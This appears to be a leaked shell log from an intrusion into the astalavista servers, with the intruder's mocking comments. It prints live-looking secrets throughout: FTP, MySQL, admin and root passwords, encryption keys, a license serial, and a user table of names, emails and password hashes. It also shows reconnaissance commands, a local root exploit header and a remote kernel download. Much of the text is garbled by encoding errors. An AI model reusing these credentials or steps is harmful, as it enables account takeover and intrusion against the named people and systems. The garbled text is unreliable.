iostat
yum install systat
rpm -qa | grep iostat
rpm -qa | grep sysstat
rpm -qa | grep systat
dmesg -c
sysctl -p
uname -r
cd /usr/src
wget nix101.com/kernels/sstlinux.tar.gz
shutdown -r now
nano -w /boot/grub/grub.conf
sh-3.2# cat .my.cnf
user=da_admin
password=X9dctmRH
sh-3.2# cat /home/com/backup_system/backup.sh
#!/bin/sh
#####################################################################
# #
# incremental backup for astalavista.com #
# #
# author: Paulo M. Santos <Á´½Ó±ê¼Çpaulo.santos@astalavista.com> #
# #
#####################################################################
PROG_DIR=¡±/home/com/backup_system¡±;
BACKUP_DIR=¡±/home/com/backups¡±;
DOBACKUP_FROM=¡±/home/com/domains/astalavista.com/public_html¡±;
# ftp for synology backup server
FTP_HOST=¡±212.254.194.163¡å;
FTP_PORT=¡±21¡å;
FTP_USER=¡±astalavista.com¡±;
FTP_PASS=¡±yWHOJbzpWTWC6Xrmg1WnfBk5V¡±;
FTP_DIR=¡±/astalavista.com¡±;
# database
DB_HOST=¡±localhost¡±;
DB_USER=¡±contrexxuser2¡å;
DB_PASS=¡±0fEYNZgXz1pKe¡±;
DB_DATABASE1=¡±com_contrexx2_live¡±;
DB_DATABASE2=¡±com_contrexx2¡å;
ftp -in $FTP_HOST $FTP_PORT <<EOF
quote USER $FTP_USER
quote PASS $FTP_PASS
cd $FTP_DIR
put $DB_FULLNAME-SQL_Dump.tar
put $BACKUP_FULLNAME-Public_HTML.tar
close
bye
EOF
sh-3.2# cd /home
sh-3.2# ls -la
total 120
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun3 02:43 ..
drwx¨Cx¨Cx9 admin admin 4096 Nov 282007 admin
-rw¡ª¡ª-1 root root 8192 Jun4 03:03 aquota.group
-rw¡ª¡ª-1 root root 8192 Jun3 02:45 aquota.user
drwx¨Cx¨Cx6 astanet astanet4096 Jun4 09:51 astanet
drwxr-xr-x2 root root 4096 Jul 292008 backup
drwxr-xr-x2 root root 4096 Sep 172008 backup.14161
drwx¨Cx¨Cx 10 com com 4096 Apr 28 12:40 com
drwxr-xr-x2 root root 4096 May 172007 ftp
drwx¡ª¡ª3 jon jon 4096 Sep 212007 jon
drwx¡ª¡ª2 root root 16384 Sep 112007 lost+found
drwxr-xr-x2 root root 4096 Sep 142007 my
drwxr-xr-x5 mysql mysql 4096 Sep 242007 mysqldata
drwx¡ª¡ª2 jon jon 4096 Sep 152007 test
drwxrwxrwt2 root root 4096 Jul 292008 tmp
sh-3.2# cd admin
sh-3.2# ls -la
total 1735896
drwx¨Cx¨Cx9 admin admin 4096 Nov 282007 .
drwxr-xr-x 14 rootroot 4096 Mar 11 17:56 ..
drwxrwxr-x2 admin admin 4096 Oct 252007 admin_backups
drwx¡ª¡ª2 admin admin 4096 Sep 282007 backups
-rw¡ª¡ª-1 admin admin 860 Sep 172008 .bash_history
-rw-r¨Cr¨C1 admin admin 24 Sep 142007 .bash_logout
-rw-r¨Cr¨C1 admin admin 176 Sep 142007 .bash_profile
-rw-r¨Cr¨C1 admin admin 124 Sep 142007 .bashrc
drwxr-xr-x2 rootroot 4096 Sep 282007 com_backups
drwx¨Cx¨Cx6 admin admin 4096 Sep 212007 domains
drwxrwx¡ª3 admin mail 4096 Sep 212007 imap
-rw-r¨Cr¨C1 rootroot 24 Sep 212007 info.php
drwx¡ª¡ª2 admin admin 4096 Sep 212007 mail
-rw-r¨Cr¨C1 rootroot 716 Nov 282007 server.csr
-rw-r¨Cr¨C1 rootroot 887 Nov 282007 server.key
-rw-r¡ª¨C1 admin mail 34 Sep 142007 .shadow
-rw-r¡ª¨C1 admin com 1775711054 Oct 252007 user.admin.com.tar.gz
drwx¨Cx¨Cx2 admin admin 4096 Jul 292008 user_backups
sh-3.2# ..
sh-3.2# cd jon
sh-3.2# ls -la
total 36
drwx¡ª¡ª3 jonjon4096 Sep 212007 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
-rw¡ª¡ª-1 jonjon 53 Sep 212007 .bash_history
-rw-r¨Cr¨C1 jonjon 24 Sep 212007 .bash_logout
-rw-r¨Cr¨C1 jonjon 176 Sep 212007 .bash_profile
-rw-r¨Cr¨C1 jonjon 124 Sep 212007 .bashrc
-rw-r¨Cr¨C1 root root 24 Sep 212007 info.php
drwxrwxr-x2 jonjon4096 Sep 212007 public_html
sh-3.2# cd ..
sh-3.2# cd test
sh-3.2# ls -la
total 48
drwx¡ª¡ª2 jonjon4096 Sep 152007 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
-rw¡ª¡ª-1 jonjon 79 Sep 212007 .bash_history
-rw-r¨Cr¨C1 jonjon 24 Sep 152007 .bash_logout
-rw-r¨Cr¨C1 jonjon 176 Sep 152007 .bash_profile
-rw-r¨Cr¨C1 jonjon 124 Sep 152007 .bashrc
sh-3.2# cat .bash_history
/usr/bin/mysqladmin -u root password PoliuJhytg67
sh-3.2# cd ..
sh-3.2# cd astanet
sh-3.2# ls -la
total 52
drwx¨Cx¨Cx6 astanet astanet 4096 Jun4 09:51 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwxr-xr-x2 root root 4096 Dec 23 16:00 auth
-rw¡ª¡ª-1 astanet astanet 3892 Apr 16 12:14 .bash_history
-rw-r¨Cr¨C1 astanet astanet 33 Dec 17 21:50 .bash_logout
-rw-r¨Cr¨C1 astanet astanet176 Dec 17 21:50 .bash_profile
-rw-r¨Cr¨C1 astanet astanet124 Dec 17 21:50 .bashrc
drwx¨Cx¨Cx3 astanet astanet 4096 Dec 23 12:18 domains
drwxrwx¡ª3 astanet mail 4096 Dec 23 12:18 imap
drwx¡ª¡ª2 astanet astanet 4096 Dec 23 12:18 mail
-rw¡ª¡ª-1 astanet astanet197 Jun4 09:51 .mysql_history
lrwxrwxrwx1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
-rw-r¡ª¨C1 astanet mail 34 Dec 22 12:41 .shadow
sh-3.2# cd auth/
sh-3.2# ls -la
total 28
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
drwx¨Cx¨Cx 6 astanet astanet 4096 Jun4 09:51 ..
-rw-r¨Cr¨C 1 root root 321 Jan52006 hackercontest.config.inc.php
-rw-r¨Cr¨C 1 root root 319 Jan52006 hosting.config.inc.php
-rw-r¨Cr¨C 1 root root 24 Jun4 09:38 .htadm_pwd
-rw-r¨Cr¨C 1 root root 49 Jan52006 .htpasswd_newhosting
-rw-r¨Cr¨C 1 root root 51 Oct 112006 .htwebalizer_pwd
sh-3.2# cat hackercontest.config.inc.php
<?PHP
// Variabeln f?r Verbindung zur Datenbank //
$conxHost = ¡®localhost¡¯; // MySQL hostname
$conxUser = ¡®hackercontest¡¯; // MySQL user
$conxPassword = ¡®K6m@7dUc¡¯; // MySQL password
$bfkey = ¡®cXvB3981¡ä; // Encryption/Decryption Key for Blowfish
?>
sh-3.2# cat hosting.config.inc.php
<?PHP
// Variabeln f?r Verbindung zur Datenbank //
$conxHost = ¡®localhost¡¯; // MySQL hostname
$conxUser = ¡®hostinguser¡¯; // MySQL user
$conxPassword = ¡®cXvB3981¡ä; // MySQL password
$bfkey = ¡®cXvB3981¡ä; // Encryption/Decryption Key for Blowfish
?>
sh-3.2# cd ..
sh-3.2# cd com
sh-3.2# ls -la
total 141208
drwx¨Cx¨Cx 10 comcom 4096 Apr 28 12:40 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwx¡ª¡ª2 comcom 4096 Jun4 04:04 backups
-rw-r¨Cr¨C1 root root 2419504 Sep 282007 backup.sql
drwxr-xr-x2 comcom 4096 May 12 15:20 backup_system
-rw¡ª¡ª-1 comcom 21880 Jun2 08:07 .bash_history
-rw-r¨Cr¨C1 comcom 24 Sep 242007 .bash_logout
-rw-r¨Cr¨C1 comcom 176 Sep 242007 .bash_profile
-rw-r¨Cr¨C1 comcom 124 Sep 242007 .bashrc
drwx¨Cx¨Cx3 comcom 4096 Jan 292008 domains
-rw-r¨Cr¨C1 comcom 16409 Jul 162008 FWUser.class.php.fixed
drwxrwx¡ª3 commail 4096 Jan6 19:24 imap
-rw¡ª¡ª-1 comcom 69 Nov 182008 .lesshst
drwx¡ª¡ª2 comcom 4096 Sep 242007 mail
-rw¡ª¡ª-1 comcom 13970 Mar 28 21:42 .mysql_history
drwxr-xr-x2 comcom 4096 Aug 202008 .ncftp
lrwxrwxrwx1 comcom 37 Sep 242007 public_html -> ./domains/astalavista.com/public_html
-rw-r¡ª¨C1 commail 34 Sep 242007 .shadow
drwx¡ª¡ª2 comcom 4096 Aug 262008 .ssh
-rwx¡ª¡ª1 comcom 8515 Feb 102008 t
-rw-rw-r¨C1 comcom 6265 Feb 112008 t.c
drwxrwxr-x2 comcom 4096 Jan 30 15:47 tmp
-rw-rw-r¨C1 comcom 617 May 202008 .toprc
-rw-rw-r¨C1 comcom141851766 May 192008 version2-backup-20080519-0900.sql
-rw¡ª¡ª-1 comcom 16629 Mar 28 21:46 .viminfo
-rw-rw-r¨C1 comcom 51 Aug 252008 .vimrc
sh-3.2# head t.c
/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
sh-3.2# cd /
sh-3.2# ls -la
total 360
drwxr-xr-x25 root root 4096 Jun3 02:43 .
drwxr-xr-x25 root root 4096 Jun3 02:43 ..
-rw¡ª¡ª- 1 root root10240 Jun3 02:39 aquota.group
-rw¡ª¡ª- 1 root root10240 Jun3 02:39 aquota.user
-rw-r¡ª¨C 1 root root 819 Jul 172008 astalavista.us.db
-rw-r¨Cr¨C 1 root root 0 Jun3 02:43 .autofsck
-rw-r¨Cr¨C 1 root root 0 Sep 162007 .autorelabel
drwxr-xr-x 3 root root 4096 Dec 292007 backup
drwxr-xr-x 2 root root 4096 Jun4 04:03 bin
drwxr-xr-x 5 root root 4096 Jun2 14:06 boot
drwxr-xr-x11 root root 3620 Jun3 02:43 dev
drwxr-xr-x84 root root12288 Jun4 03:16 etc
drwxr-xr-x14 root root 4096 Mar 11 17:56 home
-rw-r¨Cr¨C 1 root root13387 Mar 202008 httpd.conf
drwxr-xr-x11 root root 4096 Jun4 04:02 lib
drwxr-xr-x 7 root root 4096 Jun4 04:03 lib64
drwx¡ª¡ª 2 root root16384 Sep 112007 lost+found
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
drwxr-xr-x 2 root root 0 Jun3 02:43 misc
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
-rw-r¨Cr¨C 1 root root 5859 Feb32008 mrtg.cfg
drwxr-xr-x 2 root root 0 Jun3 02:43 net
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
dr-xr-xr-x 264 root root 0 Jun3 02:42 proc
drwxr-x¡ª15 root root 4096 Jun4 08:40 root
drwxr-xr-x 2 root root12288 Jun4 04:03 sbin
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
drwxr-xr-x11 root root 0 Jun3 02:42 sys
drwxrwxrwt 4 root root 122880 Jun4 10:35 tmp
drwxr-xr-x16 root root 4096 Jun2 13:56 usr
drwxr-xr-x26 root root 4096 Jun4 03:16 var
sh-3.2# cd opt
sh-3.2# ls -la
total 20
drwxr-xr-x3 root root 4096 Mar 11 17:56 .
drwxr-xr-x 25 root root 4096 Jun3 02:43 ..
drwxr-xr-x 15 root root 4096 Mar 202008 lsws
sh-3.2# cd lsws/
sh-3.2# ls -la
total 108
drwxr-xr-x 15 root root 4096 Mar 202008 .
drwxr-xr-x3 root root 4096 Mar 11 17:56 ..
drwxr-xr-x8 root root 4096 Mar 202008 add-ons
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
drwxr-xr-x5 apache apache4096 May 29 15:10 autoupdate
drwxr-xr-x2 root root 4096 May 29 15:10 bin
drwx¡ª¡ª4 apache apache4096 Jun3 02:43 conf
drwxr-xr-x7 apache apache4096 Mar 202008 DEFAULT
drwxr-xr-x2 root root 4096 Sep 152008 docs
drwxr-xr-x2 root root 4096 May 29 15:10 fcgi-bin
drwxr-xr-x2 root root 4096 Sep 152008 lib
-rw-r¨Cr¨C1 root root 6959 May 29 15:10 LICENSE
-rw-r¨Cr¨C1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
-rw-r¨Cr¨C1 root root 6279 May 29 15:10 LICENSE.OpenSSL
-rw-r¨Cr¨C1 root root 3208 May 29 15:10 LICENSE.PHP
drwxr-xr-x2 root root 20480 Jun4 09:55 logs
drwxr-xr-x2 root root 4096 Mar 202008 php
drwx¡ª¡ª2 apache apache4096 Mar 202008 phpbuild
drwxr-xr-x3 root root 4096 Mar 202008 share
-rw-r¨Cr¨C1 root root 6 May 29 15:10 VERSION
sh-3.2# cd conf
sh-3.2# ls -la
total 48
drwx¡ª¡ª4 apache apache 4096 Jun3 02:43 .
drwxr-xr-x 15 root root 4096 Mar 202008 ..
drwx¡ª¡ª2 apache apache 4096 Mar 202008 cert
-rw-r¨Cr¨C1 apache apache 6668 May 29 15:13 httpd_config.xml
-rw¡ª¡ª-1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
-rw-r¨Cr¨C1 root apache 0 Jun3 14:11 .last
-rw¡ª¡ª-1 apache apache256 May 29 15:10 license.key
-rw¡ª¡ª-1 apache apache256 Mar 212008 license.key.old
-rw¡ª¡ª-1 apache apache 3320 Mar 202008 mime.properties
-rw¡ª¡ª-1 apache apache 20 May 29 15:10 serial.no
drwx¡ª¡ª2 apache apache 4096 Mar 202008 templates
sh-3.2# cat serial.no
IbDl-oVsO-CKqL-wVRa
sh-3.2# mysql
Welcome to the MySQL monitor.Commands end with ; or \g.
Your MySQL connection id is 286844
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
Type ¡®help;¡¯ or ¡®\h¡¯ for help. Type ¡®\c¡¯ to clear the buffer.
mysql> show databases;
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| Database |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| information_schema |
| astanet_ads |
| astanet_mailing_lists |
| astanet_mediawiki |
| astanet_membersystem|
| com_contrexx |
| com_contrexx2 |
| com_contrexx2_live |
| da_roundcube |
| dolphin |
| ideapool |
| mysql |
| test |
| yourmaster |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
14 rows in set (0.00 sec)
mysql> use ideapool
Database changed
mysql> show tables;
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| Tables_in_ideapool |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| eventum_columns_to_display |
| eventum_custom_field |
| eventum_custom_field_option |
| eventum_custom_filter |
| eventum_customer_account_manager|
| eventum_customer_note |
| eventum_email_account |
| eventum_email_draft |
| eventum_email_draft_recipient |
| eventum_email_response |
| eventum_faq |
| eventum_faq_support_level |
| eventum_group |
| eventum_history_type |
| eventum_irc_notice |
| eventum_issue |
| eventum_issue_association |
| eventum_issue_attachment |
| eventum_issue_attachment_file |
| eventum_issue_checkin |
| eventum_issue_custom_field |
| eventum_issue_history |
| eventum_issue_quarantine |
| eventum_issue_requirement |
| eventum_issue_user |
| eventum_issue_user_replier |
| eventum_link_filter |
| eventum_mail_queue |
| eventum_mail_queue_log |
| eventum_news |
| eventum_note |
| eventum_phone_support |
| eventum_project |
| eventum_project_category |
| eventum_project_custom_field |
| eventum_project_email_response |
| eventum_project_field_display |
| eventum_project_group |
| eventum_project_link_filter |
| eventum_project_news |
| eventum_project_phone_category |
| eventum_project_priority |
| eventum_project_release |
| eventum_project_round_robin |
| eventum_project_status |
| eventum_project_status_date |
| eventum_project_user |
| eventum_reminder_action |
| eventum_reminder_action_list |
| eventum_reminder_action_type |
| eventum_reminder_field |
| eventum_reminder_history |
| eventum_reminder_level |
| eventum_reminder_level_condition|
| eventum_reminder_operator |
| eventum_reminder_priority |
| eventum_reminder_requirement |
| eventum_reminder_triggered_action |
| eventum_resolution |
| eventum_round_robin_user |
| eventum_search_profile |
| eventum_status |
| eventum_subscription |
| eventum_subscription_type |
| eventum_support_email |
| eventum_support_email_body |
| eventum_time_tracking |
| eventum_time_tracking_category |
| eventum_user |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
69 rows in set (0.00 sec)
mysql> describe eventum_user;
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª+¡ª¨C+¡ª¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª-+
| Field | Type | Null | Key | Default | Extra |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª+¡ª¨C+¡ª¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª-+
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
| usr_grp_id | int(11) unsigned | YES| MUL | NULL | |
| usr_customer_id | int(11) unsigned | YES| | NULL | |
| usr_customer_contact_id | int(11) unsigned | YES| | NULL | |
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
| usr_status | varchar(8) | NO | | active | |
| usr_password | varchar(32) | NO | | | |
| usr_full_name | varchar(255) | NO | | | |
| usr_email | varchar(255) | NO | UNI | | |
| usr_preferences | longtext | YES| | NULL | |
| usr_sms_email | varchar(255) | YES| | NULL | |
| usr_clocked_in | tinyint(1) | YES| | 0 | |
| usr_lang | varchar(5) | YES| | NULL | |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª+¡ª¨C+¡ª¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª-+
13 rows in set (0.00 sec)
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+
| usr_full_name | usr_email | usr_password |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+
| system | Á´½Ó±ê¼Çsystem-account@example.com | 14589714398751513457adf349173434 |
| Developer (Paulo) | Á´½Ó±ê¼Çpaulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
| Be1er0ph0r | Á´½Ó±ê¼Çbe1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
| Admin | Á´½Ó±ê¼Çpascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
| ADMIN | Á´½Ó±ê¼Çadmin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
| USER | Á´½Ó±ê¼Çuser@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
| Glafkos - (nowayout) | Á´½Ó±ê¼Çglafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
| Joao | Á´½Ó±ê¼Çjoao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
| Pascal | Á´½Ó±ê¼Çpm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
| commander | Á´½Ó±ê¼Çcommander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
| ishtus | Á´½Ó±ê¼Çishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
| sykadul | Á´½Ó±ê¼Çsykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
| Zach McElroy | Á´½Ó±ê¼Çadmin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
| usb | Á´½Ó±ê¼Çusbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
| cyph3r | Á´½Ó±ê¼Çcyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+
15 rows in set (0.00 sec)
mysql> select iss_description from eventum_issue where iss_id = 43;
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+
| iss_description
|
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in¡ how to do that? well think about it¡ if a user is watching a movie¡ he¡¯ll be
connected for 90 mins¡ 120mins¡ so what i propose is something like:
Á´½Ó±ê¼Çhttp://www.surfthechannel.com/
since they only provide LINKS to the movies they are LEGAL and don¡¯t break DMCA rules¡ so we could do the same¡ ¡°iframe¡± the content on our website or use a system
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed¡ which doesn¡¯t
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
if they think it breaks copyright laws and we will remove it¡ i think that makes it on the border of DMCA¡
We could also put advertisement during play on the flash video player itself¡ extra $$¡
By sykadul |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+
1 row in set (0.00 sec)
// Money and extra $$ is all they care about. remember that.
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+
| iss_summary | iss_description
|
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+
| Forum for REAL EXPERTS | Hello,
Ishtus and I,
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
One example a friend of mine from coresecurity.com!
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
|
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª+
1 row in set (0.00 sec)
// What an awesome yet original idea Ishtus and him¡ bring MORE security ¡°experts¡±, thats exactly what the world needs¡
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
+¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª+
| iss_summary | iss_description |
